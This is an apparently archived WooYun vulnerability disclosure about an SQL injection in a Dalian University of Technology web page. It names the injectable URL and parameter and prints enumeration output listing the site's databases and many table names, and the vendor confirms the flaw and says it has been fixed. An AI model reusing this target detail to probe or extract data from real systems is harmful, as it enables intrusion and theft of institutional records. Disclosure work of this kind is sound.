当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168641

漏洞标题:大连理工大学某站存在SQL注入漏洞可脱裤

相关厂商:大连理工大学

漏洞作者: 猪猪虾

提交时间:2016-01-11 12:16

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-11: 细节已通知厂商并且等待厂商处理中
2016-01-11: 厂商已经确认,细节仅向厂商公开
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

大连理工大学某站存在SQL注入漏洞可脱裤

详细说明:

注入点:
http://gs1.dlut.edu.cn/Supervisor/Front/dsxx/new/Default.aspx?WebPageName=zhuchungan&SpecialityID=


对WebPageName注入

available databases [15]:
[*] gsAnalysis
[*] gsApply
[*] gsCjcx
[*] gsMainDB
[*] gsPortal
[*] gsSecurityDB
[*] gstmp20120120
[*] gstmp20120124
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL_2005
[*] ReportServer$SQL_2005TempDB
[*] tempdb
[*] test
Database: gsMainDB
[33 tables]
+-------------------------------+
| D99_CMD                       |
| D99_REG                       |
| D99_Tmp                       |
| 南软.criterion                    |
| 南软.import_history               |
| 南软.reason                       |
| 南软.student                      |
| 南软.student_detail               |
| 南软.student_history              |
| 南软.student_type                 |
| 南软.teacher_assist_criterion     |
| 南软.teacher_detail               |
| 南软.teacher_history              |
| dst2q                         |
| sysdiagrams                   |
| 南软_导师                             |
| gsApplyUser.project           |
| gsApplyUser.project_auth      |
| gsApplyUser.project_type      |
| gsUser.certificate_type       |
| gsUser.department             |
| gsUser.department_old20100919 |
| gsUser.sex                    |
| gsUser.speciality             |
| gsUser.subject                |
| gsUser.subject_category       |
| gsUser.teacher                |
| gsUser.teacher_old20100919    |
| gsUser.teacher_paper          |
| gsUser.teacher_speciality     |
| gsUser.teacher_tutor_type     |
| gsUser.teacher_type           |
| gsUser.title                  |
+-------------------------------+
| sys.data_spaces                                   |
| sys.database_files                                |
| sys.database_mirroring                            |
| sys.database_mirroring_endpoints                  |
| sys.database_mirroring_witnesses                  |
| sys.database_permissions                          |
| sys.database_principal_aliases                    |
| sys.database_principals                           |
| sys.database_recovery_status                      |
| sys.database_role_members                         |
| sys.databases                                     |
| sys.default_constraints                           |
| sys.destination_data_spaces                       |
| sys.dm_broker_activated_tasks                     |
| sys.dm_broker_connections                         |
| sys.dm_broker_forwarded_messages                  |
| sys.dm_broker_queue_monitors                      |
| sys.dm_clr_appdomains                             |
| sys.dm_clr_loaded_assemblies                      |
| sys.dm_clr_properties                             |
| sys.dm_clr_tasks                                  |
| sys.dm_db_file_space_usage                        |
| sys.dm_db_index_usage_stats                       |
| sys.dm_db_mirroring_connections                   |
| sys.dm_db_missing_index_details                   |
| sys.dm_db_missing_index_group_stats               |
| sys.dm_db_missing_index_groups                    |
| sys.dm_db_partition_stats                         |
| sys.dm_db_session_space_usage                     |
| sys.dm_db_task_space_usage                        |
| sys.dm_exec_background_job_queue                  |
| sys.dm_exec_background_job_queue_stats            |
| sys.dm_exec_cached_plans                          |
| sys.dm_exec_connections                           |
| sys.dm_exec_query_optimizer_info                  |
| sys.dm_exec_query_stats                           |
| sys.dm_exec_query_transformation_stats            |
| sys.dm_exec_requests                              |
| sys.dm_exec_sessions                              |
| sys.dm_fts_active_catalogs                        |
| sys.dm_fts_index_population                       |
| sys.dm_fts_memory_buffers                         |
| sys.dm_fts_memory_pools                           |
| sys.dm_fts_population_ranges                      |
| sys.dm_io_backup_tapes                            |
| sys.dm_io_cluster_shared_drives                   |
| sys.dm_io_pending_io_requests                     |
| sys.dm_os_buffer_descriptors                      |
| sys.dm_os_child_instances                         |
| sys.dm_os_cluster_nodes                           |
| sys.dm_os_hosts                                   |
| sys.dm_os_latch_stats                             |
| sys.dm_os_loaded_modules                          |
| sys.dm_os_memory_allocations                      |
| sys.dm_os_memory_cache_clock_hands                |
| sys.dm_os_memory_cache_counters                   |
| sys.dm_os_memory_cache_entries                    |
| sys.dm_os_memory_cache_hash_tables                |
| sys.dm_os_memory_clerks                           |
| sys.dm_os_memory_objects                          |
| sys.dm_os_memory_pools                            |
| sys.dm_os_performance_counters                    |
| sys.dm_os_ring_buffers                            |
| sys.dm_os_schedulers                              |
| sys.dm_os_stacks                                  |
| sys.dm_os_sublatches                              |
| sys.dm_os_sys_info                                |
| sys.dm_os_tasks                                   |
| sys.dm_os_threads                                 |
| sys.dm_os_virtual_address_dump                    |
| sys.dm_os_wait_stats                              |
| sys.dm_os_waiting_tasks                           |
| sys.dm_os_worker_local_storage                    |
| sys.dm_os_workers                                 |
| sys.dm_qn_subscriptions                           |
| sys.dm_repl_articles                              |
| sys.dm_repl_schemas                               |
| sys.dm_repl_tranhash                              |
| sys.dm_repl_traninfo                              |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions                   |
| sys.dm_tran_current_snapshot                      |
| sys.dm_tran_current_transaction                   |
| sys.dm_tran_database_transactions                 |
| sys.dm_tran_locks                                 |
| sys.dm_tran_session_transactions                  |
| sys.dm_tran_top_version_generators                |
| sys.dm_tran_transactions_snapshot                 |
| sys.dm_tran_version_store                         |
| sys.endpoint_webmethods                           |
| sys.endpoints                                     |
| sys.event_notification_event_types                |
| sys.event_notifications                           |
| sys.events                                        |
| sys.extended_procedures                           |
| sys.extended_properties                           |
| sys.filegroups                                    |
| sys.foreign_key_columns                           |
| sys.foreign_keys                                  |
| sys.fulltext_catalogs                             |
| sys.fulltext_document_types                       |
| sys.fulltext_index_catalog_usages                 |
| sys.fulltext_index_columns                        |
| sys.fulltext_indexes                              |
| sys.fulltext_languages                            |
| sys.http_endpoints                                |
| sys.identity_columns                              |
| sys.index_columns                                 |
| sys.indexes                                       |
| sys.internal_tables                               |
| sys.key_constraints                               |
| sys.key_encryptions                               |
| sys.linked_logins                                 |
| sys.login_token                                   |
| sys.master_files                                  |
| sys.master_key_passwords                          |
| sys.message_type_xml_schema_collection_usages     |
| sys.messages                                      |
| sys.module_assembly_usages                        |
| sys.numbered_procedure_parameters                 |
| sys.numbered_procedures                           |
| sys.objects                                       |
| sys.openkeys                                      |
| sys.parameter_type_usages                         |
| sys.parameter_xml_schema_collection_usages        |
| sys.parameters                                    |
| sys.partition_functions                           |
| sys.partition_parameters                          |
| sys.partition_range_values                        |
| sys.partition_schemes                             |
| sys.partitions                                    |
| sys.plan_guides                                   |
| sys.procedures                                    |
| sys.remote_logins                                 |
| sys.remote_service_bindings                       |
| sys.routes                                        |
| sys.schemas                                       |
| sys.securable_classes                             |
| sys.server_assembly_modules                       |
| sys.server_event_notifications                    |
| sys.server_events                                 |
| sys.server_permissions                            |
| sys.server_principals                             |
| sys.server_role_members                           |
| sys.server_sql_modules                            |
| sys.server_trigger_events                         |
| sys.server_triggers                               |
| sys.servers                                       |
| sys.service_broker_endpoints                      |
| sys.service_contract_message_usages               |
| sys.service_contract_usages                       |
| sys.service_contracts                             |
| sys.service_message_types                         |
| sys.service_queue_usages                          |
| sys.service_queues                                |
| sys.services                                      |
| sys.soap_endpoints                                |
| sys.sql_dependencies                              |
| sys.sql_logins                                    |
| sys.sql_modules                                   |
| sys.stats                                         |
| sys.stats_columns                                 |
| sys.symmetric_keys                                |
| sys.synonyms                                      |
| sys.sysaltfiles                                   |
| sys.syscacheobjects                               |
| sys.syscharsets                                   |
| sys.syscolumns                                    |
| sys.syscomments                                   |
| sys.sysconfigures                                 |
| sys.sysconstraints                                |
| sys.syscurconfigs                                 |
| sys.syscursorcolumns                              |
| sys.syscursorrefs                                 |
| sys.syscursors                                    |
| sys.syscursortables                               |
| sys.sysdatabases                                  |
| sys.sysdepends                                    |
| sys.sysdevices                                    |
| sys.sysfilegroups                                 |
| sys.sysfiles                                      |
| sys.sysforeignkeys                                |
| sys.sysfulltextcatalogs                           |
| sys.sysindexes                                    |
| sys.sysindexkeys                                  |
| sys.syslanguages                                  |
| sys.syslockinfo                                   |
| sys.syslogins                                     |
| sys.sysmembers                                    |
| sys.sysmessages                                   |
| sys.sysobjects                                    |
| sys.sysoledbusers                                 |
| sys.sysopentapes                                  |
| sys.sysperfinfo                                   |
| sys.syspermissions                                |
| sys.sysprocesses                                  |
| sys.sysprotects                                   |
| sys.sysreferences                                 |
| sys.sysremotelogins                               |
| sys.syssegments                                   |
| sys.sysservers                                    |
| sys.system_columns                                |
| sys.system_components_surface_area_configuration  |
| sys.system_internals_allocation_units             |
| sys.system_internals_partition_columns            |
| sys.system_internals_partitions                   |
| sys.system_objects                                |
| sys.system_parameters                             |
| sys.system_sql_modules                            |
| sys.system_views                                  |
| sys.systypes                                      |
| sys.sysusers                                      |
| sys.tables                                        |
| sys.tcp_endpoints                                 |
| sys.trace_categories                              |
| sys.trace_columns                                 |
| sys.trace_event_bindings                          |
| sys.trace_events                                  |
| sys.trace_subclass_values                         |
| sys.traces                                        |
| sys.transmission_queue                            |
| sys.trigger_events                                |
| sys.triggers                                      |
| sys.type_assembly_usages                          |
| sys.types                                         |
| sys.user_token                                    |
| sys.via_endpoints                                 |
| sys.views                                         |
| sys.xml_indexes                                   |
| sys.xml_schema_attributes                         |
| sys.xml_schema_collections                        |
| sys.xml_schema_component_placements               |
| sys.xml_schema_components                         |
| sys.xml_schema_elements                           |
| sys.xml_schema_facets                             |
| sys.xml_schema_model_groups                       |
| sys.xml_schema_namespaces                         |
| sys.xml_schema_types                              |
| sys.xml_schema_wildcard_namespaces                |
| sys.xml_schema_wildcards                          |
+---------------------------------------------------+
Database: test
[20 tables]
+---------------------------------------------------+
| D99_Tmp                                           |
| pangolin_test_table                               |
| sysdiagrams                                       |
| gsApplyUser.project                               |
| gsApplyUser.project_auth                          |
| gsApplyUser.project_type                          |
| gsUser.certificate_type                           |
| gsUser.department                                 |
| gsUser.department_old20100919                     |
| gsUser.sex                                        |
| gsUser.speciality                                 |
| gsUser.subject                                    |
| gsUser.subject_category                           |
| gsUser.teacher                                    |
| gsUser.teacher_old20100919                        |
| gsUser.teacher_paper                              |
| gsUser.teacher_speciality                         |
| gsUser.teacher_tutor_type                         |
| gsUser.teacher_type                               |
| gsUser.title                                      |
+---------------------------------------------------+
Database: gstmp20120124
[19 tables]
+---------------------------------------------------+
| D99_Tmp                                           |
| sysdiagrams                                       |
| gsApplyUser.project                               |
| gsApplyUser.project_auth                          |
| gsApplyUser.project_type                          |
| gsUser.certificate_type                           |
| gsUser.department                                 |
| gsUser.department_old20100919                     |
| gsUser.sex                                        |
| gsUser.speciality                                 |
| gsUser.subject                                    |
| gsUser.subject_category                           |
| gsUser.teacher                                    |
| gsUser.teacher_old20100919                        |
| gsUser.teacher_paper                              |
| gsUser.teacher_speciality                         |
| gsUser.teacher_tutor_type                         |
| gsUser.teacher_type                               |
| gsUser.title                                      |
+---------------------------------------------------+


只列举部分库信息

报错.png


注入.png


注入2.png


注入3.png


注入4.png


仅作安全测试,未授权 不在进行深入操作!!

漏洞证明:

注入.png


注入3.png

修复方案:

过滤

版权声明:转载请注明来源 猪猪虾@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-11 14:08

厂商回复:

旧服务器,数据重要性不高。
已与责任部门沟通,临时限制访问,并对漏洞进行修复。

最新状态:

暂无